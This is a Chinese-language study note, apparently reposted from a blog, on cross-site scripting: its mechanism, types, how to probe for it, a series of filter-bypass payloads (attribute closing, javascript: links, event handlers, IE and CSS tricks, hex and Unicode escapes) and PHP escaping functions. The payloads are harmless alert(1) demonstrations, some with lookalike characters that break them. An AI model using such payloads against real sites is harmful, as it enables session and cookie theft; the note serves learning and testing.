xss(笔记)

xss原理

xss其实就是HTML代码注入,恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。

xss的危害

  1. 盗取cookie
  2. 网络钓鱼
  3. 劫持用户会话
  4. 网页挂马 等等

xss分类

  1. 反射型xss(非持久型)
    一般出现在搜索框,get传参里
    传参不会进入数据库,需要进行社工,诱骗管理员点击链接
  2. 存储型xss(持久型)
    一般出现在,留言框,设置资料的框,各种跟数据库有交互的框
    传参会进入数据库,管理员访问到就会中招
  3. DOM型xss
    客户端的脚本程序可以通过DOM动态的检查和修改页面内容,它不依赖于提交数据到服务器端,而从客户端获得DOM中的数据在本地执行,如果DOM中的数据没有经过严格确认,就会产生DOM-based-xss漏洞

document支持Native编码

探测xss过程

  1. 构造一个独一无二不会被识别为恶意代码的字符串用来提交,列如123qwertr
  2. 使用浏览器审查工具进行代码审查,寻找构造的字符串是否在页面中显现
  3. 查看在哪个标签中
  4. 闭合标签触发xss
    标签触发: <script>alert(1);</script>
    伪协议: <a href=javascript:alert(1)>test</a>
    事件触发:<img src="a" onerror=alert(1)/>
    "><svg/οnlοad=alert(1)>%0a
    事件参考:https://www.w3school.com.cn/js/jsref_events.asp

属性中的xss

<input type="text" name="p1" size="50" value="111"> //value中的111是输入的内容

闭合触发xss的方法

1."οnmοuseοver=alert(1)>
<input type="text" name="p1" size="50" value="" onmouseover=alert(1)>">
2."><script>alert(1)</script>
<input type="text" name="p1" size="50" value="111"><script>alert(1)</script>">

选择列表中的xss

在这里插入图片描述在这里插入图片描述

需要使用抓包工具
提交内容的时候使用burp抓取数据包测试
在这里插入图片描述放数据包,成功执行xss

在这里插入图片描述

限制长度的xss

有的文本框有输入长度限制,如果xss代码太长就无法进行xss测试

maxlength属性规定输入字段允许的最大长度

<input type="text" name="p1" maxlength="15" size="30" value=""> //输入长度限制15

直接审查元素修改输入长度即可绕过

a标签中的href

<a href="111111">111111</a>//输入的内容在href里

使用伪协议
javascript:alert(1);

<a href="javascript:alert(1);">javascript:alert(1);</a>

xss的绕过

1.事件型绕过

<>被实体编码

<input type="text" name="p1" size="50" value="" &gt;&lt;script&gt;alert(1)&lt;="" script&gt;"="">

使用事件型绕过
111" οnclick=alert(1) //

<input type="text" name="p1" size="50" value="111" οnclick=alert(1) //&lt">

使用伪协议

<a href="111111">111111</a>//输入的内容在href里

使用伪协议
javascript:alert(1)

2.双写绕过,编码绕过

有的时候输入的字符会被替换为空
就可以使用双写绕过,或者编码绕过如:base64加密

3.利用IE特性触发xss

输入的代码">

<input type="text" name="p1" size="50" value=""><script>alert(1)</script>">

被过滤掉"和<>的代码

<input type="text" name="p1" size="50" value="scriptalert(1)/script">

使用IE特性绕过
IE中 两个反引号``可以闭合左边双引号

<input type="text" name="p1" size="50" value="``οnmοusemοve=alert(1);">

在这里插入图片描述### 利用css特性触发xss
设置background:url 目前只有IE浏览器支持,并且IE11以上版本不在支持

background-color:#f00;background:url(javascript:alert(1)); //设置背景颜色

xss:expression(if(!window.x){alert(1);window.x=1;})

在这里插入图片描述

4.使用16进制绕过过滤触发xss

使用python转换成js可执行16进制
列如:<转换为16进制为\x3c
在这里插入图片描述
<>被过滤

使用16进制绕过,必须使用双\,使用一个\会被过滤掉

\\x3cscript\\x3ealert(1111);\\x3c/script\\x3e

在这里插入图片描述

5.unicode绕过过滤触发xss

unicode(统一码,万国码,单一码)
使用python将字符转换为unicode类型
在这里插入图片描述
使用unicode绕过,必须使用双\,使用一个\会被过滤掉

\\u003cscript\\u003ealert(1111);\\u003c/script\\u003e

在这里插入图片描述

xss 过滤函数

  1. htmlspecialchars()函数把预定义的字符转换为html实体
    在这里插入图片描述

  2. htmlentities()函数
    将一些特殊字符转换为HRML实体,列如用户输入<时,就会被该函数转化为HTML|实体<(&lt),输入》就被转换为实体&gt

  3. strip_tags()函数
    剥去字符串中的HTML,XML以及PHP的标签,该函数始终会剥离HTML注释,无法通过allow参数改变

猜你喜欢

转载自blog.csdn.net/weixin_45291045/article/details/109153609
xss